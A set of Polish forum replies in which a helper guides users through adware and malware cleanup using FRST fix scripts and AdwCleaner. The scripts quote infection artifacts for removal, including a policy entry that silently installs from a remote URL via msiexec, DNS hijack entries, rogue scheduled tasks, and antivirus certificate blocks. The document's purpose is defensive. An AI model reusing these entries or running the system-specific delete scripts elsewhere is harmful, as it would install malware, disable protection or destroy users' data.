picasso

Fix FRST pomyślnie wykonany. AdwCleaner wykrył dwa odpadkowe klucze adware - uruchom program ponownie i tym razem przeprowadź usuwanie. Ale jeszcze nie kończymy tematu. Ze względu na błąd w FRST, Harmonogram zadań nie został poprawnie przeskanowany (zero wykrytych elementów, a spodziewane conajmniej kilka) i nie wiadomo co tam jest. Oczekuję na naprawę tego. Zawiadomię gdy pojawi się nowa wersja FRST i poproszę o nowy log Addition.txt. EDIT: Usuwam dodane logi. Na razie przecież nie ma nowej wersji FRST, więc logi pokazują nadal to samo co wcześniej. Jak mówiłam, zawiadomię, gdy pojawi się nowa wersja.

Wszystko zgodnie z planem, blokady programów zdjęte. Poprawki: 1. Uruchom FRST. Z klawiatury CTRL+Y, zostanie otworzony plik fixlist.txt. Wklej do pliku następującą treść: RemoveDirectory: C:\AdwCleaner RemoveDirectory: C:\FRST\Quarantine RemoveDirectory: C:\Program Files\Plumbytes Software StartBatch: del /q C:\Users\Admin\Downloads\sp0twyow.exe netsh advfirewall reset EndBatch: Z klawiatury CTRL+S, by zapisać zmiany. Następnie w oknie FRST klik w Napraw (Fix). Przedstaw wynikowy fixlog.txt. 2. Uruchom AdwCleaner. Wybierz opcję Skanuj i dostarcz log wynikowy z folderu C:\AdwCleaner.

W raportach widać infekcję DNS (Izraelskie adresy IP wstawione masowo dla wszystkich interfejsów sieciowych), a także zadania adware w Harmonogramie. Działania do przeprowadzenia: 1. Przez Panel sterowania odinstaluj: Badanie mające na celu poprawę produktów HP Deskjet 2540 series (zbędny program), Reimage Protector (wątpliwy program typu PUP), McAfee Security Scan Plus (zbędny program). Sugeruję także pozbyć się Baidu Antivirus ze względu na reputację producenta. 2. Uruchom FRST. Z klawiatury CTRL+Y, zostanie otworzony plik fixlist.txt. Wklej do pliku następującą treść: CloseProcesses: CreateRestorePoint: Tcpip\Parameters: [NameServer] 82.163.142.7 95.211.158.134 Tcpip\..\Interfaces\{61DAA90B-BF4B-4A43-9CE6-42A0042F900A}: [NameServer] 82.163.142.7 95.211.158.134 Tcpip\..\Interfaces\{91F0582E-3F06-4984-8A0F-02FFF7CAC157}: [NameServer] 82.163.142.7 95.211.158.134 Tcpip\..\Interfaces\{B0EED1B6-CB08-48FD-8EC9-4DE53AF502C5}: [NameServer] 82.163.142.7 95.211.158.134 Tcpip\..\Interfaces\{EC6C85EE-BC11-4C4E-BC8E-22B7F884A041}: [NameServer] 82.163.142.7 95.211.158.134 Tcpip\..\Interfaces\{EC6C85EE-BC11-4C4E-BC8E-22B7F884A041}: [DhcpNameServer] 82.163.142.7 Tcpip\..\Interfaces\{EE020378-6564-467D-A549-964357A0CF26}: [NameServer] 82.163.142.7 95.211.158.134 Task: {0006EC56-5C34-4D34-A4BA-77E658B7072A} - System32\Tasks\Price Fountain => C:\Users\Aga\AppData\Roaming\PRICEF~1\UPDATE~1\UPDATE~1.EXE <==== UWAGA Task: {0665EF15-6A1A-406C-BEB4-00649E3CE4F3} - System32\Tasks\{D19C68BE-9B62-4B50-B25B-B60FB75B4256} => pcalua.exe -a C:\Users\Aga\Downloads\jxpiinstall.exe -d C:\Users\Aga\Downloads Task: {3E77C65F-79B4-4614-86A5-8035F5898F41} - System32\Tasks\UpdateAdmin => C:\Users\Aga\AppData\Local\UpdateAdmin\UpdateAdmin.exe <==== UWAGA Task: {53C142B3-3A5B-4D96-B67D-DBB74D9774EC} - System32\Tasks\AVAST Software\Avast settings backup => C:\Program Files\Common Files\AV\avast! Antivirus\backup.exe [2017-01-30] (AVAST Software) Task: {B5221251-46B5-4EA1-9553-B86D37AD52A6} - System32\Tasks\MailRuUpdater => C:\Users\Aga\AppData\Local\Mail.Ru\MailRuUpdater.exe Task: {DBEF82AB-6677-4837-B3AA-86A5D1F3A8D7} - System32\Tasks\blogcreativeorglropsm => Chrome.exe blogcreative.org/lropsm <==== UWAGA Task: {F2AA0768-AF1C-46BD-8167-88AC6C706808} - System32\Tasks\AgaCuffingInnervationV2 => Rundll32.exe DazednessAtheisms.dll,main 7 1 <==== UWAGA Task: {F76BFCD1-5B31-4C2A-8892-9D7E412E6421} - System32\Tasks\{6F2BB630-31D6-4E4C-12D6-22B05E43802A} => Regsvr32.exe /s /n /i:"/rt" "C:\PROGRA~2\dd11eb1b\ae390402.dll" <==== UWAGA Task: C:\Windows\Tasks\ByteFence Scan.job => C:\Program Files\ByteFence\ByteFence.exe <==== UWAGA Task: C:\Windows\Tasks\Price Fountain.job => C:\Users\Aga\AppData\Roaming\PRICEF~1\UPDATE~1\UPDATE~1.EXE <==== UWAGA Task: C:\Windows\Tasks\Sparta D1.job => C:\Program Files\Google\Chrome\Application\chrome.exe ”--app=hxxp:/plarium.com/play/en/sparta/ <==== UWAGA Task: C:\Windows\Tasks\Sparta N.job => C:\Program Files\Google\Chrome\Application\chrome.exe ”--app=hxxp:/plarium.com/play/en/sparta/ <==== UWAGA Task: C:\Windows\Tasks\Sparta W1.job => C:\Program Files\Google\Chrome\Application\chrome.exe ”--app=hxxp:/plarium.com/play/en/sparta/ <==== UWAGA Task: C:\Windows\Tasks\Sparta W2.job => C:\Program Files\Google\Chrome\Application\chrome.exe ”--app=hxxp:/plarium.com/play/en/sparta/ <==== UWAGA S3 ALSysIO; \??\C:\Users\Aga\AppData\Local\Temp\ALSysIO.sys [X] U0 aswVmm; Brak ImagePath HKLM\...\Run: [] => [X] HKLM\...\Run: [Nvtmru] => "C:\Program Files\NVIDIA Corporation\NVIDIA Update Core\nvtmru.exe" HKU\S-1-5-21-2516821565-3541718767-3179136043-1000\...\Run: [BingSvc] => C:\Users\Aga\AppData\Local\Microsoft\BingSvc\BingSvc.exe [144008 2016-03-09] (© 2015 Microsoft Corporation) HKU\S-1-5-21-2516821565-3541718767-3179136043-1000\...\Run: [mailruhomesearch] => "C:\Users\Aga\AppData\Local\Mail.Ru\Sputnik\ptls\mailruhomesearch.exe" --pr_deferred GroupPolicy: Ograniczenia ? <======= UWAGA GroupPolicy\User: Ograniczenia ? <======= UWAGA HKU\S-1-5-21-2516821565-3541718767-3179136043-1000\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.bing.com/search?q={searchTerms} HKU\S-1-5-21-2516821565-3541718767-3179136043-1000\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://mail.ru/cnt/10445?gp=811040 SearchScopes: HKLM -> DefaultScope {ielnksrch} URL = SearchScopes: HKLM -> ielnksrch URL = hxxp://www.bing.com/search?q={searchTerms} SearchScopes: HKU\S-1-5-21-2516821565-3541718767-3179136043-1000 -> DefaultScope {FFEBBF0A-C22C-4172-89FF-45215A135AC7} URL = SearchScopes: HKU\S-1-5-21-2516821565-3541718767-3179136043-1000 -> {ielnksrch} URL = hxxp://www.bing.com/search?q={searchTerms} BHO: Ďîčńę@Mail.Ru -> {8E8F97CD-60B5-456F-A201-73065652D099} -> C:\Users\Aga\AppData\Local\Mail.Ru\Sputnik\IESearchPlugin.dll => Brak pliku CustomCLSID: HKU\S-1-5-21-2516821565-3541718767-3179136043-1000_Classes\CLSID\{010833F3-751A-402F-9FCC-C365B6A12E41}\localserver32 -> C:\Users\Aga\Desktop\BESTplayer.exe => Brak pliku CustomCLSID: HKU\S-1-5-21-2516821565-3541718767-3179136043-1000_Classes\CLSID\{554EBE31-AEC1-4E34-BCE3-606467760D88}\localserver32 -> "C:\Users\Aga\AppData\Local\TNT2\2.0.0.2030\TNT2User.exe" => Brak pliku CustomCLSID: HKU\S-1-5-21-2516821565-3541718767-3179136043-1000_Classes\CLSID\{820D63D5-8CFF-46DE-86AF-4997DEDD6DB5}\localserver32 -> "C:\Windows\system32\igfxEM.exe" => Brak pliku ShellIconOverlayIdentifiers: [00avast] -> {472083B0-C522-11CF-8763-00608CC02F24} => -> Brak pliku DeleteKey: HKCU\Software\Google\Chrome\Extensions DeleteKey: HKLM\SOFTWARE\Google\Chrome\Extensions DeleteKey: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\AVAST Software C:\Program Files\Common Files\AV\avast! Antivirus C:\Users\Aga\AppData\Local\Google\Chrome\User Data\System Profile C:\Users\Aga\AppData\Local\Mail.Ru C:\Users\Aga\AppData\Local\Microsoft\BingSvc C:\Users\Aga\AppData\Local\Opera Software C:\Users\Aga\AppData\Local\UpdateAdmin C:\Users\Aga\AppData\Local\{4F53AA78-FE9E-4769-B97D-CCF83A64758B} C:\Users\Aga\AppData\Local\{C8BB3E69-11C4-4B6B-B098-FF9E0CCB1647} C:\Users\Aga\AppData\Roaming\*.* C:\Users\Aga\AppData\Roaming\Opera Software C:\Windows\System32\Tasks\AVAST Software CMD: ipconfig /flushdns CMD: netsh advfirewall reset EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Z klawiatury CTRL+S, by zapisać zmiany. Następnie w oknie FRST klik w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, nastąpi restart systemu. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 3. Wyczyść przeglądarki: Firefox: Odłącz synchronizację (o ile włączona): KLIK. Menu Pomoc > Informacje dla pomocy technicznej > Odśwież program Firefox. Zakładki i hasła nie zostaną naruszone. Menu Historia > Wyczyść całą historię przeglądania. Google Chrome: Zresetuj synchronizację (o ile włączona): KLIK. Ustawienia > karta Ustawienia > Pokaż ustawienia zaawansowane > zjedź na sam spód i uruchom opcję Resetowanie ustawień. Zakładki i hasła nie zostaną naruszone. Ustawienia > karta Ustawienia > sekcja Szukaj > klik w Zarządzanie wyszukiwarkami > skasuj z listy niedomyślne śmieci (o ile będą). 4. Zrób nowy log FRST z opcji Skanuj (Scan), z zaznaczonym polem Shortcut którego poprzednio zabrakło. Dołącz też plik fixlog.txt.

W systemie nadal działa ogromna ilość szkodliwych elementów, a antywirusy są zablokowane metodą Niezaufanych certyfikatów. Działania do przeprowadzenia: 1. Przez Panel sterowania odinstaluj wątpliwy program Plumbytes Anti-Malware 2017. 2. Uruchom FRST. Z klawiatury CTRL+Y, zostanie otworzony plik fixlist.txt. Wklej do pliku następującą treść: CloseProcesses: R1 cryptfd; C:\Windows\System32\drivers\cryptfd.sys [195496 2017-05-25] () R1 ucdrv; C:\Program Files (x86)\UCBrowser\Security:ucdrv-x64.sys [25444 ] (UC Web Inc.) AlternateDataStreams: C:\Windows\system32\drivers:ucdrv-x64.sys [25444] AlternateDataStreams: C:\Windows\system32\drivers:x64 [1498914] AlternateDataStreams: C:\Windows\system32\drivers:x86 [1223458] HKLM-x32\...\Run: [ProductUpdater] => C:\Program Files (x86)\Common Files\Freemake Shared\ProductUpdater\ProductUpdater.exe HKLM\...\RunOnce: [KOMPUTEREK] => C:\Windows\Temp\g445F.tmp.exe [313856 2017-06-11] () HKLM\ DisallowedCertificates: 03D22C9C66915D58C88912B64C1F984B8344EF09 (Comodo Security Solutions) HKLM\ DisallowedCertificates: 0F684EC1163281085C6AF20528878103ACEFCAAB (F-Secure Corporation) HKLM\ DisallowedCertificates: 1667908C9E22EFBD0590E088715CC74BE4C60884 (FRISK Software International/F-Prot) HKLM\ DisallowedCertificates: 18DEA4EFA93B06AE997D234411F3FD72A677EECE (Bitdefender SRL) HKLM\ DisallowedCertificates: 2026D13756EB0DB753DF26CB3B7EEBE3E70BB2CF (G DATA Software AG) HKLM\ DisallowedCertificates: 249BDA38A611CD746A132FA2AF995A2D3C941264 (Malwarebytes Corporation) HKLM\ DisallowedCertificates: 31AC96A6C17C425222C46D55C3CCA6BA12E54DAF (Symantec Corporation) HKLM\ DisallowedCertificates: 331E2046A1CCA7BFEF766724394BE6112B4CA3F7 (Trend Micro) HKLM\ DisallowedCertificates: 3353EA609334A9F23A701B9159E30CB6C22D4C59 (Webroot Inc.) HKLM\ DisallowedCertificates: 373C33726722D3A5D1EDD1F1585D5D25B39BEA1A (SUPERAntiSpyware.com) HKLM\ DisallowedCertificates: 3850EDD77CC74EC9F4829AE406BBF9C21E0DA87F (Kaspersky Lab) HKLM\ DisallowedCertificates: 3D496FA682E65FC122351EC29B55AB94F3BB03FC (AVG Technologies CZ) HKLM\ DisallowedCertificates: 4243A03DB4C3C15149CEA8B38EEA1DA4F26BD159 (PC Tools) HKLM\ DisallowedCertificates: 42727E052C0C2E1B35AB53E1005FD9EDC9DE8F01 (K7 Computing Pvt Ltd) HKLM\ DisallowedCertificates: 4420C99742DF11DD0795BC15B7B0ABF090DC84DF (Doctor Web Ltd.) HKLM\ DisallowedCertificates: 4C0AF5719009B7C9D85C5EAEDFA3B7F090FE5FFF (Emsisoft Ltd) HKLM\ DisallowedCertificates: 5240AB5B05D11B37900AC7712A3C6AE42F377C8C (Check Point Software Technologies Ltd.) HKLM\ DisallowedCertificates: 5DD3D41810F28B2A13E9A004E6412061E28FA48D (Emsisoft Ltd) HKLM\ DisallowedCertificates: 7457A3793086DBB58B3858D6476889E3311E550E (K7 Computing Pvt Ltd) HKLM\ DisallowedCertificates: 76A9295EF4343E12DFC5FE05DC57227C1AB00D29 (BullGuard Ltd) HKLM\ DisallowedCertificates: 775B373B33B9D15B58BC02B184704332B97C3CAF (McAfee) HKLM\ DisallowedCertificates: 872CD334B7E7B3C3D1C6114CD6B221026D505EAB (Comodo Security Solutions) HKLM\ DisallowedCertificates: 88AD5DFE24126872B33175D1778687B642323ACF (McAfee) HKLM\ DisallowedCertificates: 9132E8B079D080E01D52631690BE18EBC2347C1E (Adaware Software) HKLM\ DisallowedCertificates: 982D98951CF3C0CA2A02814D474A976CBFF6BDB1 (Safer Networking Ltd.) HKLM\ DisallowedCertificates: 9A08641F7C5F2CCA0888388BE3E5DBDDAAA3B361 (Webroot Inc.) HKLM\ DisallowedCertificates: 9C43F665E690AB4D486D4717B456C5554D4BCEB5 (ThreatTrack Security) HKLM\ DisallowedCertificates: 9E3F95577B37C74CA2F70C1E1859E798B7FC6B13 (CURIOLAB S.M.B.A.) HKLM\ DisallowedCertificates: A1F8DCB086E461E2ABB4B46ADCFA0B48C58B6E99 (Avira Operations GmbH & Co. KG) HKLM\ DisallowedCertificates: A5341949ABE1407DD7BF7DFE75460D9608FBC309 (BullGuard Ltd) HKLM\ DisallowedCertificates: A59CC32724DD07A6FC33F7806945481A2D13CA2F (ESET) HKLM\ DisallowedCertificates: AB7E760DA2485EA9EF5A6EEE7647748D4BA6B947 (AVG Technologies CZ) HKLM\ DisallowedCertificates: AD4C5429E10F4FF6C01840C20ABA344D7401209F (Avast Antivirus/Software) HKLM\ DisallowedCertificates: AD96BB64BA36379D2E354660780C2067B81DA2E0 (Symantec Corporation) HKLM\ DisallowedCertificates: B8EBF0E696AF77F51C96DB4D044586E2F4F8FD84 (Malwarebytes Corporation) HKLM\ DisallowedCertificates: CDC37C22FE9272D8F2610206AD397A45040326B8 (Trend Micro) HKLM\ DisallowedCertificates: D3F78D747E7C5D6D3AE8ABFDDA7522BFB4CBD598 (Kaspersky Lab) HKLM\ DisallowedCertificates: DB303C9B61282DE525DC754A535CA2D6A9BD3D87 (ThreatTrack Security) HKLM\ DisallowedCertificates: DB77E5CFEC34459146748B667C97B185619251BA (Avast Antivirus/Software) HKLM\ DisallowedCertificates: E22240E837B52E691C71DF248F12D27F96441C00 (Total Defense, Inc.) HKLM\ DisallowedCertificates: E513EAB8610CFFD7C87E00BCA15C23AAB407FCEF (AVG Technologies CZ) HKLM\ DisallowedCertificates: ED841A61C0F76025598421BC1B00E24189E68D54 (Bitdefender SRL) HKLM\ DisallowedCertificates: F83099622B4A9F72CB5081F742164AD1B8D048C9 (ESET) HKLM\ DisallowedCertificates: FBB42F089AF2D570F2BF6F493D107A3255A9BB1A (Panda Security S.L) HKLM\ DisallowedCertificates: FFFA650F2CB2ABC0D80527B524DD3F9FC172C138 (Doctor Web Ltd.) HKU\S-1-5-21-1768268483-3808830105-315920841-1000\...\Run: [blueStacks Agent] => C:\Program Files (x86)\BlueStacks\HD-Agent.exe HKU\S-1-5-21-1768268483-3808830105-315920841-1000\...\Run: [e2r2-dqG-i.exe] => C:\Program Files\Windows Media Player\SYKUMONAG79KUXM4N3QUV5440\e2r2-dqG-i.exe [274944 2017-06-10] () HKU\S-1-5-21-1768268483-3808830105-315920841-1000\...\Run: [7QjUzbh.exe] => C:\Users\Admin\AppData\Local\Temp\bfd0ceadeeff4bb7b543fedb69ed363a\7QjUzbh.exe [274944 2017-06-10] () HKU\S-1-5-21-1768268483-3808830105-315920841-1000\...\Run: [g5r5bvtQx.exe] => C:\Users\Admin\AppData\Roaming\cc8a6a80f7fd4a7aadc900c39a1609f7\g5r5bvtQx.exe [274944 2017-06-10] () HKU\S-1-5-21-1768268483-3808830105-315920841-1000\...\Run: [G2SljB6G6ktJQ.exe] => C:\Users\Admin\AppData\Local\cfd39f6f03fe4cc399a0c58897b84128\G2SljB6G6ktJQ.exe [274944 2017-06-10] () HKU\S-1-5-21-1768268483-3808830105-315920841-1000\...\Run: [Goblyw3fZx.exe] => C:\Users\Admin\AppData\Roaming\2676253838a14647bbb331a1744e4bec\Goblyw3fZx.exe [274944 2017-06-10] () ShellIconOverlayIdentifiers: [JzShlobj] -> {9A0700D2-920A-4E52-8697-9B5230C92612} => C:\Program Files (x86)\Maoha\JiSuZip\JZipExt.dll -> Brak pliku BHO: VKOKAdBlock -> {FF20459C-DA6E-41A7-80BC-8F4FEFD9C575} -> C:\Program Files (x86)\VKOKAblockIE\t7XYIfbUR.dll => Brak pliku HKU\S-1-5-21-1768268483-3808830105-315920841-1000\Software\Microsoft\Internet Explorer\Main,Start Page = GroupPolicy: Ograniczenia - Chrome FirewallRules: [{48B34065-295C-4828-9BE8-083D0598A8EB}] => (Allow) C:\Windows\system32\rundll32.exe FirewallRules: [{63460BFC-9796-4764-BE1A-06D9E1ADE21B}] => (Allow) C:\Windows\System32\rundll32.exe FirewallRules: [{B09F3E96-572A-44DA-8AEF-7460A7D94F2F}] => (Allow) C:\Windows\System32\rundll32.exe FirewallRules: [{49D76C2E-8733-40AF-85CD-707349E02C6C}] => (Allow) C:\Windows\System32\rundll32.exe FirewallRules: [{80F63EEC-7473-4A05-A2C0-469F2DC1E9AF}] => (Allow) C:\Windows\System32\rundll32.exe DeleteKey: HKCU\Software\MozillaPlugins DeleteKey: HKLM\SOFTWARE\MozillaPlugins DeleteKey: HKLM\SOFTWARE\Wow6432Node\Google\Chrome\Extensions DeleteKey: HKLM\SOFTWARE\Wow6432Node\MozillaPlugins C:\Program Files (x86)\GUT2CF9.tmp C:\Program Files (x86)\UCBrowser C:\Program Files\Windows Media Player\SYKUMONAG79KUXM4N3QUV5440 C:\ProgramData\WindowsVideoErrorReporting C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Dragon Age Początek\Centrum pomocy produktów EA.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Dragon Age Początek\Przeglądaj plik Readme.lnk C:\ProgramData\Microsoft\Windows\GameExplorer\{CF057CC4-4F39-42AF-A61E-6B4DE25C7AF2} C:\ProgramData\Microsoft\Windows\GameExplorer\{C7BFE639-CE26-4F2C-9239-76541CCB0933} C:\Users\Admin\AppData\Local\installer.dat C:\Users\Admin\AppData\Local\test_db_cara.db C:\Users\Admin\AppData\Local\TroubleshooterConfig.json C:\Users\Admin\AppData\Local\{12A8CCFE-3C33-4995-BAD8-074E4C5B22FD} C:\Users\Admin\AppData\Local\cfd39f6f03fe4cc399a0c58897b84128 C:\Users\Admin\AppData\LocalLow\VKOK C:\Users\Admin\AppData\Roaming\aa59a429f78e41c1afe07429c433b20c C:\Users\Admin\AppData\Roaming\2676253838a14647bbb331a1744e4bec C:\Users\Admin\AppData\Roaming\1a7fa33c17c847c4aee3a60ba065f9c6 C:\Users\Admin\AppData\Roaming\cc8a6a80f7fd4a7aadc900c39a1609f7 C:\Users\Admin\AppData\Roaming\02e8a25c1de946749c7ef6d2dcdd74a0 C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Extensions\cockmkcmoohjkdpaiglfomnfapioccfd C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Extensions\pbdpajcdgknpendpmecafmopknefafha C:\Users\Admin\Desktop\Gmail.lnk C:\Users\Admin\Desktop\games\Mass Effect.lnk C:\Users\Admin\Desktop\games\McAfee Security Scan Plus.lnk C:\Windows\System32\drivers\cryptfd.sys C:\Windows\System32\Tasks\Hafez Video Converter C:\Windows\System32\Tasks\SMW_UpdateTask_Time_313538383034363130352d3437415a556c2a3223346c41 Hosts: EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Z klawiatury CTRL+S, by zapisać zmiany. Następnie przejdź w Tryb awaryjny Windows, uruchom FRST i klik w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, nastąpi restart systemu, opuść Tryb awaryjny. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 3. W Operze CTRL+SHIFT+E i na liście rozszerzeń sprawdź co się wyświetla. Jeśli widać tam dwa dziwne rozszerzenia, odinstaluj. 4. Zrób nowy log FRST z opcji Skanuj (Scan), bez Shortcut. Dołącz też plik fixlog.txt.

Skoro nie używany, to usunie go poniższy skrypt. Uruchom FRST. Z klawiatury CTRL+Y, zostanie otworzony plik fixlist.txt. Wklej do pliku następującą treść: CloseProcesses: Task: {99839982-7126-4C82-B5B4-8B7145035B16} - System32\Tasks\AutoKMS => C:\Windows\AutoKMS\AutoKMS.exe [2015-01-03] () RemoveDirectory: C:\AdwCleaner RemoveDirectory: C:\FRST\Quarantine RemoveDirectory: C:\Users\GOKUiSOUNF\Doctor Web RemoveDirectory: C:\Windows\AutoKMS Z klawiatury CTRL+S, by zapisać zmiany. Następnie w oknie FRST klik w Napraw (Fix). Nastąpi restart. Przedstaw wynikowy fixlog.txt. I wypowiedz się czy po usuwaniu nadal są zgłoszenia AVG.

Skasuj z dysku plik C:\delfix.txt. To wszystko.

Oznak infekcji tu nie widzę. Nie jest natomiast wykluczone, że to zgłoszenie może być powiązane z aktywnością cracka aktywacji - AVG go bardzo nie lubi. Czy ten crack jest nadal w użytku? Task: {99839982-7126-4C82-B5B4-8B7145035B16} - System32\Tasks\AutoKMS => C:\Windows\AutoKMS\AutoKMS.exe [2015-01-03] () PS. I możesz wykonać kosmetyczny skrypt usuwający wpisy szczątkowe, schowany w spoilerze:

Czy to zachowanie nadal ma miejsce po użyciu skryptu FRST? Większość zadań wykonana, ale pojawiły się nowe wpisy. Poprawki: 1. Uruchom FRST. Z klawiatury CTRL+Y, zostanie otworzony plik fixlist.txt. Wklej do pliku następującą treść: HKU\S-1-5-21-489643024-731826354-959299013-1000\...\Policies\system: [shell] explorer.exe,msiexec.exe /i hxxp://point.ltdmsjq.com/?data=zDlkMj1YMTNWMUUdRTLXMjZQRUFcNjNLMWVSFjHyMUVLRTFdFc== /q S1 iSafeKrnlMon; \??\C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnlMon.sys [X] ShortcutWithArgument: C:\Users\Lambert\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer (64-bit).lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www.yeadesktop.com/ ShortcutWithArgument: C:\Users\Lambert\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk -> C:\Program Files (x86)\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www.yeadesktop.com/ ShortcutWithArgument: C:\Users\Lambert\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Launch Internet-Explorer Browser.lnk -> C:\Program Files (x86)\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www.yeadesktop.com/ DeleteKey: HKLM\SOFTWARE\Wow6432Node\Mozilla\Thunderbird RemoveDirectory: C:\AdwCleaner RemoveDirectory: C:\FRST\Quarantine RemoveDirectory: C:\Users\Lambert\Downloads\FRST-OlderVersion StartBatch: del /q C:\Users\Lambert\Desktop\adwcleaner*.* del /q C:\Users\Lambert\Downloads\adwcleaner*.* del /q C:\Users\Lambert\Downloads\qd1y4yyr.exe del /q C:\Users\Lambert\Downloads\SPTDinst-v189-x64.exe del /q C:\Windows\system32\Drivers\iSafeKrnlBoot.sys del /q C:\Windows\system32\Drivers\iSafeNetFilter.sys EndBatch: Z klawiatury CTRL+S, by zapisać zmiany. Następnie w oknie FRST klik w Napraw (Fix). Przedstaw wynikowy fixlog.txt. 2. Spróbuj ponowić usuwanie wyszukiwarki mystarting123.com z Google Chrome. 3. Pobierz z przyklejonego najnowszą wersję AdwCleaner. Następnie uruchom w nim czyszczenie i dostarcz log wynikowy z folderu C:\AdwCleaner.

1. AdwCleaner wykrył jeszcze inne odpadki adware - uruchom go ponownie i tym razem zastosuj po kolei opcje Skanuj + Oczyść. Gdy program ukończy zadanie: 2. Przez SHIFT+DEL (omija Kosz) skasuj FRST z katalogu D:\Programy\skanowanie komputera i raporty. Następnie zastosuj DelFix. To wszystko.

W tej sytuacji dostarcz chociaż podfolder z rozszerzeniami: C:\Users\tom615\AppData\Roaming\Opera Software\Opera Stable\Extensions Czy zaznaczyłeś opcję usuwania "danych użytkownika" podczas deinstalacji? Na wszelki wypadek możesz zastosować skrypt do FRST usuwający szczątki: DeleteKey: HKCU\Software\Google DeleteKey: HKLM\SOFTWARE\Wow6432Node\Google RemoveDirectory: C:\Program Files (x86)\Google RemoveDirectory: C:\Users\tom615\AppData\Local\Google RemoveDirectory: C:\FRST\Quarantine

Wszystko pomyślnie wykonane, adware usunięte. Teraz poprawki: 1. Uruchom FRST. Z klawiatury CTRL+Y, zostanie otworzony plik fixlist.txt. Wklej do pliku następującą treść: DeleteKey: HKLM\SOFTWARE\Mozilla DeleteKey: HKLM\SOFTWARE\WOW6432Node\Eggper DeleteKey: HKLM\SOFTWARE\WOW6432Node\Firefox DeleteKey: HKLM\SOFTWARE\WOW6432Node\Mozilla DeleteKey: HKU\S-1-5-21-570807183-2887973835-1248124564-1000\SOFTWARE\Classes\ftp DeleteKey: HKU\S-1-5-21-570807183-2887973835-1248124564-1000\SOFTWARE\Classes\http DeleteKey: HKU\S-1-5-21-570807183-2887973835-1248124564-1000\SOFTWARE\Classes\https DeleteKey: HKU\S-1-5-21-570807183-2887973835-1248124564-1000\SOFTWARE\Classes\irc DeleteKey: HKU\S-1-5-21-570807183-2887973835-1248124564-1000\SOFTWARE\Classes\mailto DeleteKey: HKU\S-1-5-21-570807183-2887973835-1248124564-1000\SOFTWARE\Classes\mms DeleteKey: HKU\S-1-5-21-570807183-2887973835-1248124564-1000\SOFTWARE\Classes\news DeleteKey: HKU\S-1-5-21-570807183-2887973835-1248124564-1000\SOFTWARE\Classes\nntp DeleteKey: HKU\S-1-5-21-570807183-2887973835-1248124564-1000\SOFTWARE\Classes\sms DeleteKey: HKU\S-1-5-21-570807183-2887973835-1248124564-1000\SOFTWARE\Classes\smsto DeleteKey: HKU\S-1-5-21-570807183-2887973835-1248124564-1000\SOFTWARE\Classes\tel DeleteKey: HKU\S-1-5-21-570807183-2887973835-1248124564-1000\SOFTWARE\Classes\urn DeleteKey: HKU\S-1-5-21-570807183-2887973835-1248124564-1000\SOFTWARE\Classes\webcal DeleteKey: HKU\S-1-5-21-570807183-2887973835-1248124564-1000\SOFTWARE\Eggper DeleteKey: HKU\S-1-5-21-570807183-2887973835-1248124564-1000\SOFTWARE\Firefox DeleteKey: HKU\S-1-5-21-570807183-2887973835-1248124564-1000\SOFTWARE\Mozilla DeleteKey: HKU\S-1-5-21-570807183-2887973835-1248124564-1000\SOFTWARE\Microsoft\Internet Explorer\LowRegistry\Audio\PolicyConfig\PropertyStore\37de59f2_0 DeleteKey: HKU\S-1-5-21-570807183-2887973835-1248124564-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Search\RecentApps\{1A49764D-CF78-4AD5-94D6-68A341A9ECCC} DeleteValue: HKU\S-1-5-21-570807183-2887973835-1248124564-1000\SOFTWARE\Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache|C:\Program Files (x86)\Firefox\Firefox.exe.FriendlyAppName DeleteValue: HKU\S-1-5-21-570807183-2887973835-1248124564-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Compatibility Assistant\Store|C:\Program Files (x86)\Firefox\bin\FirefoxUpdate.exe DeleteValue: HKU\S-1-5-21-570807183-2887973835-1248124564-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Compatibility Assistant\Store|C:\Program Files (x86)\Firefox\uninstall\helper.exe U2 CSHMDR; Brak ImagePath U2 CWASRE; Brak ImagePath U2 snare; Brak ImagePath U2 WinSnare; Brak ImagePath RemoveDirectory: C:\FRST\Quarantine CMD: del /q "C:\Users\MI\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Powiadomienia monitorowania tuszu - .lnk" Z klawiatury CTRL+S, by zapisać zmiany. Następnie w oknie FRST klik w Napraw (Fix). Przedstaw wynikowy fixlog.txt. 2. Uruchom AdwCleaner. Wybierz opcję Skanuj i dostarcz log wynikowy z folderu C:\AdwCleaner.

